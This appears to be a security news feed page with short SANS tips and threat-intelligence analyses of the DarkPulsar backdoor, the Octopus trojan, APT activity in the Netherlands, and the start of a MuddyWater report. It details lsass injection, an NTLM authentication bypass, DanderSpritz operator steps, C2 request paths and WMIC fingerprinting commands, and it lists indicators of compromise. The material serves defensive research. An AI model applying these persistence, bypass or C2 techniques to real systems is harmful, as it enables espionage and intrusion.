Malware RSS Feed

Shopping Online

SANS Tip of the Day - 14 hours 49 min ago
When shopping online, always use your credit cards instead of a debit card. If any fraud happens, it is far easier to recover your money from a credit card transaction. Gift cards and one-time-use credit card numbers are even more secure.

DarkPulsar FAQ

Malware Alerts - Fri, 10/19/2018 - 06:00

What’s it all about?

In March 2017, a group of hackers calling themselves “the Shadow Brokers” published a chunk of stolen data that included two frameworks: DanderSpritz and FuzzBunch. The Fuzzbunch framework contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. In pair, it is a very powerful platform for cyber-espionage.

How was this implant discovered?

We always analyze all leaks containing malicious software to provide the best detection. The same happened after the “Lost in Translation” leak was revealed. We noticed that this leak contained a tool in the “implants” category called DarkPulsar. We analyzed this tool and understood that it is not a backdoor itself, but the administrative part only. We also noticed some magic constants in this administrative module, and having created some special signatures based on them, were able to catch the implant itself.

What exactly can this implant be used for?

This implant supports 7 commands:

The most interesting are DisableSecurity and EnableSecurity.

  • Burn – for self-deletion.
  • RawShellcode – to execute arbitrary base-independent code.
  • EDFStageUpload – Exploit Development Framework Stage Upload. Step by step it deploys DanderSpritz payloads to the victim’s memory without touching the drive. After this command is executed, the administrator can send to the victim any of the multiple DanderSpritz commands. (View details in the technical part of this report)
  • DisableSecurity – for disabling NTLM protocol security. With help of this command, the malware administrator does not need to know a valid victim username and password to successfully pass authentication – the system will interpret any arbitrary pair as valid. (View details in the technical part of this report)
  • EnableSecurite – the opposite of DisableSecurity.
  • UpgradeImplant – for installing a new version of the backdoor.
  • PingPong – for test communication.
How many victims?

We found around 50 victims, but believe that the figure was much higher when the Fuzzbunch and DanderSpritz frameworks were actively used. We think so because of the DanderSpritz interface, which allows many victims to be managed at the same time. The second point proving this suggestion is that after stopping their cyber-espionage campaign, the malware owners often delete their malware from victim computers, so the 50 victims are very probably just ones that the attackers have simply forgotten.

Which countries?

All victims were located in Russia, Iran, and Egypt, and typically Windows 2003/2008 Server was infected. Targets were related to nuclear energy, telecommunications, IT, aerospace, and R&D

What about the attack duration? Does it last long?

DarkPulsar’s creators did not skimp on resources in developing such an advanced mechanism of persistence. They also included functionality to disable NTLM protocol security for bypassing the need to enter a valid username and password during authentication. This indicates that victims infected with DarkPulsar were the targets of a long-term espionage attack.

Is the attack still active?

We think that after the “Lost In Translation” leakage the espionage campaign was stopped, but that doesn’t mean that all computers are rid of this backdoor infection. We cured all our users. As for users without our protection, we have several tips on how to check whether your system is infected and how to cure it by yourself. Note that to exploit this backdoor on infected victims, the attackers need to know the private RSA key which pairs to the public key embedded in the backdoor. It means that no one except real DarkPulsar’s managers can exploit compromised systems.

How to protect against this threat?

We can detect this threat with different technologies.

However, the standard recommendations remain the same:

  • Keep your security products up to date
  • Do not turn security product components off
  • Keep your OS updated
  • Install all security patches asap
  • Use special traffic analysis tools and pay attention to all encrypted traffic
  • Do not use weak passwords or the same password for several endpoints
  • Use complex passwords
  • Do not allow remote connections to endpoints with administration rights
  • Do not allow domain administrators to be local administrators with the same credentials

Additional mitigation strategies can be found here:

Which proactive technologies do you have to protect users against such threats?

We use machine learning, cloud technologies, emulation, and behavioral analysis in combination with anti-exploit protection to provide the best proactive protection for our clients.

Who is behind this threat?

We never engage in attribution. Our purpose is to counteract all threats, regardless of their source or destination.

How was this implant used? Was it created for stealing money or just information?

We have not seen any techniques for stealing money in this implant, but it is worth keeping in mind that this implant can run any executable code, so its functionality can be increased significantly.

DarkPulsar

Malware Alerts - Fri, 10/19/2018 - 06:00

In March 2017, the ShadowBrokers published a chunk of stolen data that included two frameworks: DanderSpritz and FuzzBunch.

DanderSpritz consists entirely of plugins to gather intelligence, use exploits and examine already controlled machines. It is written in Java and provides a graphical windows interface similar to botnets administrative panels as well as a Metasploit-like console interface. It also includes its own backdoors and plugins for not-FuzzBunch-controlled victims.

DanderSprit interface

Fuzzbunch on the other hand provides a framework for different utilities to interact and work together. It contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. There are three files in the plugin set from the FuzzBunch framework:

  • %pluginName%-version.fb

This is the utility file of the framework. It duplicates the header from XML and includes the plugin’s ID.

  • %pluginName%-version.exe

This executable file is launched when FuZZbuNch receives the command to do so.

  • %pluginName%-version.xml

This configuration file describes the plugin’s input and output parameters – the parameter name, its type and description of what it’s responsible for; all of these can be shown in FuzzBunch as a prompt. This file also contributes a lot to the framework’s usability, as it supports the specification of default parameters.

One of the most interesting Fuzzbunch’s categories is called ImplantConfig and includes plugins designed to control the infected machines via an implant at the post-exploitation stage. DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ‘sipauth32.tsp’ that provides remote control, belonging to this category.

It supports the following commands:

  • Burn
  • RawShellcode
  • EDFStagedUpload
  • DisableSecurity
  • EnableSecurity
  • UpgradeImplant
  • PingPong

Burn, RawShellcode, UpgradeImplant, and PingPong remove the implant, run arbitrary code, upgrade the implant and check if the backdoor is installed on a remote machine, respectively. The purpose of the other commands is not that obvious and, to make it worse, the leaked framework contained only the administrative module to work with DarkPulsar’s backdoor, but not the backdoor itself.

While analyzing the administrative module, we noticed several constants that are used to encrypt the traffic between the C&C and the implant:

We thought that probably these constants should also appear in the backdoor, so we created a detection for them. Several months later we found our mysterious DarkPulsar backdoor. We later were able to find both 32- and 64-bit versions.

We found around 50 victims located in Russia, Iran and Egypt, typically infecting Windows 2003/2008 Server. Targets were related to nuclear energy, telecommunications, IT, aerospace and R&D.

DarkPulsar technical highlights

The DarkPulsar implant is a dynamic library whose payload is implemented in exported functions. These functions can be grouped as follows:

  1. Two nameless functions used to install the backdoor in the system.
  2. Functions with names related to TSPI (Telephony Service Provider Interface) operations that ensure the backdoor is in the autorun list and launched automatically.
  3. A function with a name related to SSPI (Security Support Provider Interface) operations. It implements the main malicious payload.

The implementations of the SSPI and TSPI interfaces are minimalistic: the functions that are exported by DarkPulsar have the same names as the interface functions; however, they include malicious code instead of the phone service.

The implant is installed in the system by the nameless exported function. The backdoor is launched by calling Secur32.AddSecurityPackage with administrator privileges with the path to its own library in the parameter, causing lsass.exe to load DarkPulsar as SSP/AP and to call its exported function SpLsaModeInitialize used by DarkPulsar to initialize the backdoor. In this way AddSecurityPackage is used to inject code into lsass.exe. It also adds its library name at HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers

This is loaded at start by the Telephony API (TapiSrv) launched alongside the Remote Access Connection Manager (RasMan) service, setting startup type as “Automatic”. When loading the telephony service provider’s library, TapiSrv calls TSPI_lineNegotiateTSPIVersion which contains the AddSecurityPackage call to make the inject into lsass.exe.

DarkPulsar implements its payload by installing hooks for the SpAcceptLsaModeContext – function responsible for authentication. Such injects are made in several system authentication packets within the process lsass.exe and allow Darkpulsar to control authentication process based on the following protocols:

  • Msv1_0.dll – for the NTLM protocol,
  • Kerberos.dll – for the Kerberos protocol,
  • Schannel.dll – for the TLS/SSL protocols,
  • Wdigest.dll – for the Digest protocol, and
  • Lsasrv.dll –for the Negotiate protocol.

After this, Darkpulsar gets ability to embed malware traffic into system protocols. Since this network activity takes place according to standard system charts, it will only be reflected in the System process – it uses the system ports reserved for the above protocols without hindering their normal operation.

Network traffic during successful connection to DarkPulsar implant

The second advantage of controlling authentication processes is ability to bypass entering a valid username and password for obtaining access to objects that require authentication such as processes list, remote registry, file system through SMB. After Darkpulsar’s DisableSecurity command is sent, backdoor’s hooks on the victim side will always returns in the SpAcceptLsaModeContext function that passed credentials are valid. Getting that, system will provide access to protected objects to client.

Working with DarkPulsar

Darkpulsar-1.1.0.exe is the administrative interface working under the principle of “one command – one launch”. The command to be executed must be specified either in the configuration file Darkpulsar-1.1.0.9.xml or as command line arguments, detailing at least:

  • whether the target machine uses a 32-bit or 64-bit system;
  • protocol (SMB, NBT, SSL, RDP protocols are supported) to deliver the command and port number
  • private RSA key to decrypt the session AES key

Darkpulsar-1.1.0 was not designed as a standalone program for managing infected machines. This utility is a plugin of the Fuzzbunch framework that can manage parameters and coordinate different components. Here is how DisableSecurity command in Fuzzbunch looks like:

Below is an example of Processlist after DisableSecurity, allowing to execute any plugin without valid credentials and operating via regular system functions (remote registry service):

DanderSpritz

DanderSpritz is the framework for controlling infected machines, different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar.

For DanderSpritz works for a larger range of backdoors, using PeedleCheap in the victim to enable operators launching plugins. PeddleCheap is a plugin of DanderSpritz which can be used to configure implants and connect to infected machines. Once a connection is established all DanderSpritz post-exploitation features become available.

This is how DarkPulsar in EDFStagedUpload mode provides the opportunity to infect the victim with a more functional implant: PCDllLauncher (Fuzzbunch’s plugin) deploys the PeddleCheap implant on the victim side, and DanderSpritz provides a user-friendly post-exploitation interface. Hence, the full name of PCDllLauncher is ‘PeddleCheap DLL Launcher’.

The complete DanderSpritz usage scheme with the plugin PeddleCheap via FuZZbuNch with the plugins DarkPulsar and PCDllLauncher consists of four steps:

  1. Via FuZZbuNch, run command EDFStagedUpload to launch DarkPulsar.
  2. In DanderSpritz, run command pc_prep (PeedelCheap Preparation) to prepare the payload and the library to be launched on the implant side.
  3. In DanderSpritz, run command pc_old (which is the alias of command pc_listen -reuse -nolisten -key Default) – this sets it to wait for a socket from Pcdlllauncher.
  4. Launch Pcdlllauncher via FuZZbuNch and specify the path to the payload that has been prepared with the command pc_prep in the ImplantFilename parameter.

  5. DanderSpritz

    File System plugin

    Conclusions

    The FuzzBunch and DanderSpritz frameworks are designed to be flexible and to extend functionality and compatibility with other tools. Each of them consists of a set of plugins designed for different tasks: while FuzzBunch plugins are responsible for reconnaissance and attacking a victim, plugins in the DanderSpritz framework are developed for managing already infected victims.

    The discovery of the DarkPulsar backdoor helped in understanding its role as a bridge between the two leaked frameworks, and how they are part of the same attacking platform designed for long-term compromise, based on DarkPulsar’s advanced abilities for persistence and stealthiness. The implementation of these capabilities, such as encapsulating its traffic into legitimate protocols and bypassing entering credentials to pass authentication, are highly professional.

    Our product can completely remove the related to this attack malware.

    Detecting malicious network activity

    When EDFStagedUpload is executed in an infected machine, a permanent connection is established, which is why traffic via port 445 appears. A pair of bound sockets also appears in lsass.exe:

    When DanderSpritz deploys PeddleCheap’s payload via the PcDllLauncher plugin, network activity increases dramatically:

    When a connection to the infected machine is terminated, network activity ceases, and only traces of the two bound sockets in lsass.exe remain:

    IOCs

    implant – 96f10cfa6ba24c9ecd08aa6d37993fe4
    File path – %SystemRoot%\System32\sipauth32.tsp
    Registry – HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers

    Browse With Encryption

    SANS Tip of the Day - Thu, 10/18/2018 - 01:00
    When browsing online, encrypting your online activities is one of the best ways to protect yourself. Make sure your online connection is encrypted by making sure HTTPS is in the website address and/or that there is a lock next to it.

    Octopus-infested seas of Central Asia

    Malware Alerts - Mon, 10/15/2018 - 06:00

    For the last two years we have been monitoring a Russian-language cyberespionage actor that focuses on Central Asian users and diplomatic entities. We named the actor DustSquad and have provided private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware. In this blogpost we cover a malicious program for Windows called Octopus that mostly targets diplomatic entities.

    The name was originally coined by ESET in 2017 after the 0ct0pus3.php script used by the actor on their old C2 servers. We also started monitoring the malware and, using Kaspersky Attribution Engine based on similarity algorithms, discovered that Octopus is related to DustSquad, something we reported in April 2018. In our telemetry we tracked this campaign back to 2014 in the former Soviet republics of Central Asia (still mostly Russian-speaking), plus Afghanistan.

    In the case of Octopus, DustSquad used Delphi as their programming language of choice, which is unusual for such an actor. Among others exceptions are the Russian-language Zebrocy (Sofacy’s Delphi malware), the Hindi-language DroppingElephant and the Turkish-language StrongPity. Although we detected Octopus victims that were also infected with Zebrocy/Sofacy, we didn’t find any strong similarities and we don’t consider the two actors to be related.

    What happened?

    In April 2018 we discovered a new Octopus sample pretending to be communication software for a Kazakh opposition political group. The malware is packed into a ZIP file named dvkmailer.zip with a timestamp from February-March 2018. DVK stands for Kazakhstan Democratic Choice, an opposition political party that is prohibited in the country. The image below shows the acronym ‘ДВК’ in Russian (Демократический Выбор Казахстана). DVK enjoys a healthy Telegram presence, making Telegram´s potential ban a hot topic in Kazakhstan. The dropper pretends to be Telegram Messenger with a Russian interface.

    We couldn´t find any legitimate software that this malware appears to be impersonating; in fact, we don´t believe it exists. The Trojan uses third-party Delphi libraries like The Indy Project for JSON-based C2 communications and TurboPower Abbrevia (sourceforge.net/projects/tpabbrevia) for compression. Malware persistence is basic and achieved via the system registry. The server side uses commercial hosting in different countries with .php scripts deployed. Kaspersky Lab products detect the Octopus Trojan as Trojan.Win32.Octopus.gen. For more information, please contact: intelreports@kaspersky.com.

    Technical details

    The attackers used the potential Telegram ban in Kazakhstan to push its dropper as an alternative communication software for the political opposition.

    ‘Telegram messenger’ establishes network module persistence in the simplest way and starts the module

    We can’t confirm how this malware is being distributed, although it clearly uses some form of social engineering. This actor previously used spear phishing to spread malware.

    Dropper MD5 hash 979eff03faeaeea5310df53ee1a2fc8e Name dvkmailer.zip Archive contents d6e813a393f40c7375052a15e940bc67 CsvHelper.dll Legit .NET CSV files parser 664a15bdc747c560c11aa0cf1a7bf06e Telegram Messenger.exe Persistence and launcher 87126c8489baa8096c6f30456f5bef5e TelegramApi.dll Network module d41d8cd98f00b204e9800998ecf8427e Settings.json Empty Launcher MD5 hash 664a15bdc747c560c11aa0cf1a7bf06e File name Telegram Messenger.exe PE timestamp 2018.03.18 21:34:12 (GMT) Linker version 2.25 (Embarcadero Delphi)

    Before any user interaction, inside the FormCreate() function the launcher checks for a file named TelegramApi.dll in the same directory. If it exists, the launcher copies the network module to the startup directory as Java.exe and runs it.

    The ‘Send mailing’ button in the bottom right corner doesn’t even have a handler function

    Delphi Visual Component Library (VCL) programs are based on event handlers for form elements. Such programs are extremely large (about 2.6 MB and 12,000 functions), but all this code is mostly used to handle the visual components and run-time libraries. There are only three programmer-defined handlers for controlling elements inside the Octopus launcher.

    Function name Functionality FormCreate() Runs as constructor before any user activity. Makes the network module persistent via Startup directory and runs it Button1Click() Shows the explorer dialog window to choose the “mailing file” DateTimePicker1Click() Shows calendar to select the “mailing date”

    There is no handler for the ‘Send mailing’ button, so the launcher pretends to be an alternative communicator that in reality does nothing. This may be because the malware is still unfinished – after all, messages sent through it could be of value to the attackers. However, we believe it is more likely that the malware was created in a hurry and the attackers decided to skip any communication features.

    Network module

    C2 communication scheme

    MD5 hash 87126c8489baa8096c6f30456f5bef5e File name TelegramApi.dll PE timestamp 2018.02.06 11:09:28 (GMT) Linker version 2.25 (Embarcadero Delphi)

    Despite the file extension, this network module is a self-sufficient portable executable file and not a dynamic-link library. The first sample checks for files with names like 1?????????.* in the user’s temporary folder and deletes any files it finds. Then it creates .profiles.ini in the Application Data directory where the malware stores its log.

    HTTP request Response GET /d.php?check JSON “ok” GET /d.php?servers JSON domain name GET /i.php?check= JSON “ok” POST /i.php?query= JSON response code or command depends on POST data

    First stage .php script to check connection and get C2 domain name

    All network modules consist of hardcoded IP addresses belonging to commercial web-hosting services based in different countries. The operators simply deploy their first-stage .php script in them, which will check the connection and get the actual C2 server domain name using an HTTP GET request.

    After the initial connection check, the malware receives a JSON with the actual C2 domain name

    Then the network module checks against the hardcoded victim’s id

    The network module checks against a 32-digit hardcoded victim id and sends the gathered data to the C2 using a HTTP POST request. In terms of programming, this id is strange, because the malware simultaneously ‘fingerprints’ its victim with an MD5 hash of its system data.

    JSON-based gathered data sent in a HTTP POST base64-encoded request

    All communication with the C2s is based on JSON-formatted data and the HTTP protocol. For that, the developers used The Indy Project (indyproject.org) publicly available library as well as the third-party TurboPower Abbrevia (sourceforge.net/projects/tpabbrevia) for compression.

    After all the initial HTTP GET requests, the malware starts to gather JSON-formatted system data. For all the fixed drives in the system, the network module stores the disk name and size, as well as computer and user name, Windows directory, host IP, etc. One interesting field is “vr”:”2.0″ which appears to be the malware version encoded in the communication protocol.

    The ‘id’ field is the victim’s fingerprint for which the malware actively uses the Windows Management Instrumentation mechanism. The Trojan runs WMIC.exe with the following arguments:

    C:\WINDOWS\system32\wbem\WMIC.exe computersystem get Name /format:list C:\WINDOWS\system32\wbem\WMIC.exe os get installdate /format:list C:\WINDOWS\system32\wbem\WMIC.exe path CIM_LogicalDiskBasedOnPartition get Antecedent,Dependent

    Then the module concatenates the gathered ids and computes an MD5 hash, which will be the victim’s final id. The “act” field numbers the communication stage (0 for initial fingerprinting). After this, the HTTP POST control server returns a JSON {“rt”:”30″} and the client continues with the next “act” in the HTTP POST:

    At this point the C2 sends a JSON with commands to execute, including uploading/downloading files, taking a screenshot and finding *.rar archives on the host.

    Other software

    Besides the Trojan itself, the Octopus developers used the password dumping utility fgdump.

    Infrastructure MD5 hash IPs C2 domain 87126c8489baa8096c6f30456f5bef5e 185.106.120.27
    204.145.94.10 porenticofacts.com ee3c829e7c773b4f94b700902ea3223c 38f30749a87dcbf156689300737a094e 185.106.120.240
    204.145.94.101 certificatesshop.com 6e85996c021d55328322ce8e93b31088 5.188.231.101
    103.208.86.238 blondehairman.com 7c0050a3e7aa3172392dcbab3bb92566 5.8.88.87
    103.208.86.237 latecafe.in 2bf2f63c927616527a693edf31ecebea 85.93.31.141
    104.223.20.136 hovnanflovers.com d9ad277eb23b6268465edb3f68b12cb2 5.188.231.101
    103.208.86.238 blondehairman.com

    The most recent samples (2017-2018) of hardcoded IPs and web domains obtained from the .php script

    Conclusions

    Political entities in Central Asia have been targeted throughout 2018 by different actors, including IndigoZebra, Sofacy (with Zebrocy malware) and most recently by DustSquad (with Octopus malware). Interestingly, we observed some victims who are ‘threat magnets’ targeted by all of them. From our experience we can say that the interest shown by threat actors in this region is now high, and the traditional ‘players’ have been joined by relative newcomers like DustSquad that have sprung up locally.

    Indicators of compromise File hashes

    87126c8489baa8096c6f30456f5bef5e
    ee3c829e7c773b4f94b700902ea3223c
    38f30749a87dcbf156689300737a094e
    6e85996c021d55328322ce8e93b31088
    7c0050a3e7aa3172392dcbab3bb92566
    2bf2f63c927616527a693edf31ecebea
    d9ad277eb23b6268465edb3f68b12cb2

    Domains and IPs

    85.93.31.141
    104.223.20.136
    5.8.88.87
    103.208.86.237
    185.106.120.240
    204.145.94.101
    5.188.231.101
    103.208.86.238
    185.106.120.27
    204.145.94.10
    hovnanflovers.com
    latecafe.in
    certificatesshop.com
    blondehairman.com
    porenticofacts.com

    Auxiliary URLs to upload/download files:

    www.fayloobmennik.net/files/save_new.html
    http://uploadsforyou.com/download/
    http://uploadsforyou.com/remove/

    The following are old indicators of compromise no longer used by this actor, but which can be used for forensic purposes:

    031e4900715564a21d0217c22609d73f
    1610cddb80d1be5d711feb46610f8a77
    1ce9548eae045433a0c943a07bb0570a
    3a54b3f9e9bd54b4098fe592d805bf72
    546ab9cdac9a812aab3e785b749c89b2
    5cbbdce774a737618b8aa852ae754251
    688854008f567e65138c3c34fb2562d0
    6fda541befa1ca675d9a0cc310c49061
    73d5d104b34fc14d32c04b30ce4de4ae
    88ad67294cf53d521f8295aa1a7b5c46
    a90caeb6645b6c866ef60eb2d5f2d0c5
    ae4e901509b05022bbe7ef340f4ad96c
    ca743d10d27277584834e72afefd6be8
    ce45e69eac5c55419f2c30d9a8c9104b
    df392cd03909ad5cd7dcea83ee6d66a0
    e149c1da1e05774e6b168b6b00272eb4
    f625ba7f9d7577db561d4a39a6bb134a
    fc8b5b2f0b1132527a2bcb5985c2fe6b
    f7b1503a48a46e3269e6c6b537b033f8
    4f4a8898b0aa4507dbb568dca1dedd38

    First stage .php script placed at:

    148.251.185.168
    185.106.120.46
    185.106.120.47
    46.249.52.244
    5.255.71.84
    5.255.71.85
    88.198.204.196
    92.63.88.142

    Domains returned by .php script:

    giftfromspace.com
    mikohanzer.website
    humorpics.download
    desperados20.es
    prom3.biz.ua

    Reporting an Incident

    SANS Tip of the Day - Mon, 10/15/2018 - 01:00
    Bad guys are very persistent, eventually anyone can make a mistake. If a phone call from the "Help Desk" doesn't sound quite right, if an email seems suspicious or if a program you installed starts acting funny, ask for help! In addition, perhaps you lost a work laptop or a USB drive. The sooner you report an incident, the sooner we can help resolve the problem.

    Securely Disposing Mobile Devices

    SANS Tip of the Day - Fri, 10/12/2018 - 01:00
    Do you plan on giving away or selling one of your older mobile devices? Make sure you wipe or reset your device before disposing of it. If you don't, the next person who owns it will have access to all of your accounts and personal information.

    Threats in the Netherlands

    Malware Alerts - Thu, 10/11/2018 - 03:30

    Introduction

    On October 4, 2018, the MIVD held a press conference about an intercepted cyberattack on the OPWC in the Netherlands, allegedly by the advanced threat actor Sofacy (also known as APT28 or Fancy Bear, among others). According to the MIVD, four suspects were caught red handed trying to break into the OPWC’s network. Sofacy activity in the Netherlands did not come as a surprise to us, since we have seen signs of its presence in that country before. However, aside from Sofacy we haven’t seen many other advanced persistent threat (APT) groups in the Netherlands, at least when compared to other areas, such as the Middle-East. Upon further reflection, we have concluded that this is rather odd. There are quite a few big multinationals and some high tech companies located in the Netherlands. In addition, there are other potential strategic targets for threat actors. So we decided to review cyber-threat activity targeting or affecting the Netherlands.

    Providing an overview of one APT’s activity can be quite difficult, let alone all the APT activity affecting a country. First, we only see what we can see. That means we can only gather data from sources we have access to, such as that shared voluntarily by our customers with Kaspersky Security Network (KSN), and those sources also need to be supplied with data related to a specific APT. As a result, like any other cybersecurity vendor, our telemetry is naturally incomplete.

    One way to improve our overview is to use sinkhole data. When a domain that is used by an APT expires, researchers can register that domain and direct the traffic to a sinkhole server. This is done quite frequently. For many of the APTs we track, we sinkhole at least one domain. In comparison to other sources, such as KSN and multi-scanner services, sinkhole data has a number of advantages. For example, in some cases you can get a better overview of the victimology of the APT. The drawback is that we need to filter the results, since there can be quite a few false positives (e.g. because other researchers are investigating the malware). This filtering can be quite cumbersome, because if we base it solely on the IP and the requests, it is quite difficult to come to a verdict.

    Methodology

    For this blogpost we gathered all the sinkhole data for Dutch IPs in the last four years (September 2014 to September 2018), which amounts to around 85,000 entries. Of course, this is far too much to verify by hand, so the first step was to filter the results, and especially all the scanners. While some of these were relatively easy to spot and filter out (e.g. all the TOR exit nodes, all the Romanian.anti-sec), others required a bit more effort.

    In order to filter out the scanners, we deleted all entries where the IP matched more than four “tags” (each tag stands for a different campaign). After doing this, we were left with around 11,000. That meant 77% fewer results, but there were still too many, so we applied some more aggressive filtering.

    The table below describes the number of tags that were hit per IP.

    0 10,532 1 1,149 2 618 3 344 4 234 >4 938

    One way to determine whether a hit in the sinkhole database is a true positive (TP) or a false positive (FP), is to find out who the victim is. We thus reversed the IP and checked whether, at the time of the first entry in our sinkhole database, the DNS entry matched the entries in our passive DNS database. If this was not the case, the entry was ignored. The next step was to remove all the entries that would be difficult to investigate (e.g. IP addresses that belong to an ADSL connection). Even though this method was quite rigid and meant that some TPs might be missed, we still decided to use it, since we knew it would be too resource-intensive to investigate all the entries. The result: only around 1,000 entries remained for investigation.

    The aim of this blogpost is to give an overview of which APT groups are active in the Netherlands and what they are interested in, and that requires TPs, not FPs. For each remaining entry, a reverse DNS lookup was made, and the ASN information was saved. This was checked against our passive DNS database to see whether this IP had the same domain as its first entry in the sinkhole database. If it did, the entry was kept, if it was not, we tried to find out to which organization the IP belonged.

    At this point, for the entries that remained, the raw requests were retrieved against the template request made by the APT. Finally, for each of the IPs left on our list, we tried to tie them to a company or institution. If this was the case, the entry was kept and marked as a TP.

    We also checked our APT reports for targets in the Netherlands and added these results to the review.

    Results

    Using the methods described above, we found the following APTs that are or have been active in the Netherlands:

    BlackOasis

    BlackOasis is an APT group we have been tracking since May 2016. It uses the commercially available FinFisher malware made by Gamma International and sold to law enforcement agencies (LEAs) and nation states. BlackOasis differentiates itself from other APT-groups by using a vast amount of 0-days: at least five since 2015. Victims are mostly found in Middle Eastern countries, where the group is particularly interested in politics. We have also seen it targeting members of the United Nations and regional news correspondents. Recently we have seen a shift in focus towards other countries such as Russia, the UK and now also the Netherlands. Its Dutch victims fit into its shift of interest.

    Sofacy

    Sofacy, also known as Pawn Storm, Fancy Bear and many other names is an active APT group that we have followed since 2011. It is known for using spear phishing emails to infect targets and for the active deployment of 0-days. In 2015, Trend Micro researchers reported that the group had targeted the MH17 investigation team. Last year, the Volkskrant published an article alleging it tried to infect several Dutch Ministries. Then there is the October 4, 2018 news of four alleged Sofacy members having been caught in April 2018 trying to hack the OPWC. Even though we cannot confirm these last two incidents, since we are not involved, we have observed several targets in the Netherlands infected with Sofacy. Interestingly, we observe fewer deployments of Xagent (one of Sofacy’s modules) after April 2018. Although one new Xagent deployment was noted in August 2018, it seems that the group pushed fewer, and then only new, deployments from April through June 2018.

    Hades

    Hades is the name given to the group held responsible for the Olympic Destroyer malware that was found targeting the 2018 Winter Olympic Games in South Korea. Our initial thought was that the malware was related to the Lazarus group, because several of our Yara rules had 100% matches with the malware. However, after careful research we found many false flags that pointed to different APT groups. A few months later, in May 2018 (not long after the OPWC incident took place), we found that Hades had returned and was now targeting financial institutions and chemical threat prevention laboratories. Given this shift of interest, it is no surprise that entities in the Netherlands were targeted as well.

    Buhtrap

    Buhtrap is one of the groups that targets financial institutions with the ultimate goal of stealing money. Its tools, techniques and processes (TTPs) don’t differ extensively from those of traditional APT groups. Buhtrap is one of those (Carbanak and Tyupkin are others) that started by infecting financial institutions in Russia and Ukraine, but after a while shifted its focus to other parts of the world. We found Buhtrap activity in the Netherlands in 2017.

    The Lamberts

    In March 2017, WikiLeaks published online a series of documents that they call “Vault 7”. Some of these documents feature malware that resembles that used by the Lamberts, a toolkit that has been used for several years, with most of its activity occurring in 2013 and 2014. One of The Lamberts’ variants we have been investigating is the “Green Lamberts”. We were surprised to see quite a few infections in the Netherlands, when the majority of attacks target Iran. We do not have any insight into the profile of the victims located in the Netherlands. Nevertheless, the fact that Lamberts is active in the Netherlands shows a possible shift in focus, and reminds us that for APT groups, borders do not exist.

    Turla

    Turla, also known as Uroboros, is a very active APT group, believed to be connected to many high-profile incidents such as the US Central Command attack in 2008 and the breach of RUAG (a Swiss military contractor). Other Turla targets include ministries and governmental organizations. Given all this, the Netherlands is a logical target for the Turla group. In fact, we would have been surprised not to have found any Turla infections in the Netherlands.

    Gatak

    Gatak, which also goes by the names of Stegoloader and GOLD, is a group that engages in data theft using watering hole attacks. It has been active since at least 2015, and its main interest is in intellectual property. Even though the use of watering hole attacks means the group does not have full control over who it infects, it has been able to hit a couple of high profile targets. In this case, our sinkhole database enabled us to determine that one of those was a high profile target in the Netherlands.

    Putter Panda

    In 2015, the Dutch chip maker, ASML was allegedly breached by Putter Panda. ASML acknowledged the breach and stated that one file was stolen. No further details are publicly available, although there was an episode of the TV program “KRO reporter“, partially dedicated to the breach. ASML is one of relatively few high-tech companies in the Netherlands. The fact that it has been breached is a clear sign that foreign threat actors are aware of and interested in industrial espionage in the Netherlands.

    Animal Farm

    Animal Farm is a group that has been active since at least 2009. A relatively advanced threat actor, it has been targeting a variety of organizations over the past years. Victims include governmental organizations, military contractors, activists and journalists. Even though the group is mainly focused on French speaking countries, we still found a few infections in the Netherlands.

    Conclusion

    Although our visibility of threat actor activity in the Netherlands is incomplete, the results are nevertheless surprising. Some groups we did not expect to see appear to be active in the country (such as the Lamberts). However, upon further thought, and especially when looking at potential targets located in the Netherlands and comparing this with the interests of some of the APT groups, their activity in the Netherlands makes sense.

    The presence of both expected and unexpected threat actors is a good argument for organizations staying informed of the latest developments in cyberspace, particularly through threat intelligence reports. Because if you know what APT groups are up to, which organisations they target and what TTPs they use, you can implement the protection you need to stay one step ahead of them.

    Such precautions are important, because one of the most stunning findings from the review of sinkhole databases was the number of organizations infected using “ordinary cybercrime malware”. We saw infections among airlines, airports and other major companies (although it should be noted that this happens in other countries as well, not just in the Netherlands). It demonstrates again that it is not so difficult for (APT) groups to breach valuable targets and that basic cyber hygiene is important for everybody.

    As a final note, one should always be careful about deriving hard conclusions from APT findings, particularly in terms of attribution. For example, even though we saw Olympic Destroyer malware being used to target chemical threat prevention laboratories shortly after the OPWC incident, this is not conclusive evidence that the groups behind these attacks are the same, or even related. However, using this fact to monitor your network for the presence of Olympic Destroyer malware if you think you might be a potential Sofacy target – and vice versa – seems like a good approach.

    For more information on our private threat intelligence reporting service, please contact intelreports@kaspersky.com

    MuddyWater expands operations

    Malware Alerts - Wed, 10/10/2018 - 06:00

    Summary

    MuddyWater is a relatively new APT that surfaced in 2017. It has focused mainly on governmental targets in Iraq and Saudi Arabia, according to past telemetry. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large amount of spear phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia, other victims were also detected in Mali, Austria, Russia, Iran and Bahrain.. These new documents have appeared throughout 2018 and escalated from May onwards. The attacks are still ongoing.

    The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers.

    Decoy images by country Jordan

    The Hashemite Kingdom of Jordan, Ministry of Justice (mwjo.doc) DAMAMAX.doc

    Turkey

    Turkey’s General Directorate of Security Turkey’s Directorate General of Coastal Safety

    Turkey’s General Directorate of Security (Onemli Rapor.doc) Turkey’s Ministry of the Interior (Early election.doc)

    Saudi Arabia

    Document signed by the Major General Pilot, commander of the Saudi Royal Air Force

    KSA King Saud University (KSU) KSA King Saud University (KSU)

    Azerbaijan

    İnkişaf üçün görüş.doc (meeting for development)

    Iraq

    Iraqi Ministry of Foreign Affairs Government of Iraq, the Treasury of the Council of Ministers

    Pakistan

    ECP.doc National Assembly of Pakistan.doc

    P.Police.doc

    Afghanistan

